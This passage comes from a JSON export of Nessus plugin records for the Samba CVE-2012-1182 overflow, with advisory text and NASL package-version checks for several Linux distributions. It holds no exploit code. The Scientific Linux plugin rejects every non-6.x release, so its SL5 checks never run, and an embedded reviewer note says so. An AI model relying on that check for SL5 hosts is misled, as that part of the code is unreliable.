After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : samba3x (ELSA-2012-0466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba3x", "p-cpe:/a:oracle:linux:samba3x-client", "p-cpe:/a:oracle:linux:samba3x-common", "p-cpe:/a:oracle:linux:samba3x-doc", "p-cpe:/a:oracle:linux:samba3x-domainjoin-gui", "p-cpe:/a:oracle:linux:samba3x-swat", "p-cpe:/a:oracle:linux:samba3x-winbind", "p-cpe:/a:oracle:linux:samba3x-winbind-devel", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2012-0466.NASL", "href": "https://www.tenable.com/plugins/nessus/68507", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0466 and \n# Oracle Linux Security Advisory ELSA-2012-0466 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68507);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2012:0466\");\n\n script_name(english:\"Oracle Linux 5 : samba3x (ELSA-2012-0466)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0466 :\n\nUpdated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6\nExtended Update Support.\n\nThe Red Hat Security Response 
Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002737.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba3x packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 
value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", 
reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:27", "description": "Fix for CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-23T00:00:00", "type": "nessus", "title": "Fedora 15 : samba-3.5.14-73.fc15.1 (2012-5805)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-5805.NASL", "href": "https://www.tenable.com/plugins/nessus/58823", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5805.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58823);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-5805\");\n\n script_name(english:\"Fedora 15 : samba-3.5.14-73.fc15.1 (2012-5805)\");\n script_summary(english:\"Checks rpm output for the updated 
package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=811392\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/078836.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64867e64\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/13\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"samba-3.5.14-73.fc15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:57:50", "description": "Samba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows 
PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.\n\nReviewer note: the plugin source in this record audits out unless the detected release is Scientific Linux 6.x, so the SL5 package checks it lists do not appear to be reached on an SL5 host; a clean result there should be confirmed against the installed samba package versions.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : samba on SL5.x, SL6.x i386/x86_64 (20120410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:libsmbclient", "p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel", "p-cpe:/a:fermilab:scientific_linux:samba", "p-cpe:/a:fermilab:scientific_linux:samba-client", "p-cpe:/a:fermilab:scientific_linux:samba-common", "p-cpe:/a:fermilab:scientific_linux:samba-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba-doc", "p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba-swat", "p-cpe:/a:fermilab:scientific_linux:samba-winbind", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120410_SAMBA_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific 
Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61298);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL5.x, SL6.x i386/x86_64 (20120410)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=972\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?391e04eb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-debuginfo-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-debuginfo-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif 
(rpm_check(release:\"SL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:45", "description": "A vulnerability has been found and corrected in samba :\n\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call (CVE-2012-1182).\n\nThe updated packages have been patched to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-12T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : samba (MDVSA-2012:055)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64netapi-devel", "p-cpe:/a:mandriva:linux:lib64netapi0", "p-cpe:/a:mandriva:linux:lib64smbclient0", "p-cpe:/a:mandriva:linux:lib64smbclient0-devel", "p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel", "p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel", "p-cpe:/a:mandriva:linux:lib64smbsharemodes0", "p-cpe:/a:mandriva:linux:lib64wbclient-devel", "p-cpe:/a:mandriva:linux:lib64wbclient0", "p-cpe:/a:mandriva:linux:libnetapi-devel", "p-cpe:/a:mandriva:linux:libnetapi0", "p-cpe:/a:mandriva:linux:libsmbclient0", "p-cpe:/a:mandriva:linux:libsmbclient0-devel", 
"p-cpe:/a:mandriva:linux:libsmbclient0-static-devel", "p-cpe:/a:mandriva:linux:libsmbsharemodes-devel", "p-cpe:/a:mandriva:linux:libsmbsharemodes0", "p-cpe:/a:mandriva:linux:libwbclient-devel", "p-cpe:/a:mandriva:linux:libwbclient0", "p-cpe:/a:mandriva:linux:mount-cifs", "p-cpe:/a:mandriva:linux:nss_wins", "p-cpe:/a:mandriva:linux:samba-client", "p-cpe:/a:mandriva:linux:samba-common", "p-cpe:/a:mandriva:linux:samba-doc", "p-cpe:/a:mandriva:linux:samba-domainjoin-gui", "p-cpe:/a:mandriva:linux:samba-server", "p-cpe:/a:mandriva:linux:samba-swat", "p-cpe:/a:mandriva:linux:samba-winbind", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2012-055.NASL", "href": "https://www.tenable.com/plugins/nessus/58716", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:055. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58716);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"MDVSA\", value:\"2012:055\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba (MDVSA-2012:055)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in samba :\n\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\narray length in a manner consistent with validation of array 
memory\nallocation, which allows remote attackers to execute arbitrary code\nvia a crafted RPC call (CVE-2012-1182).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient0\");\n script_set_attribute(attribute:\"cpe\", 
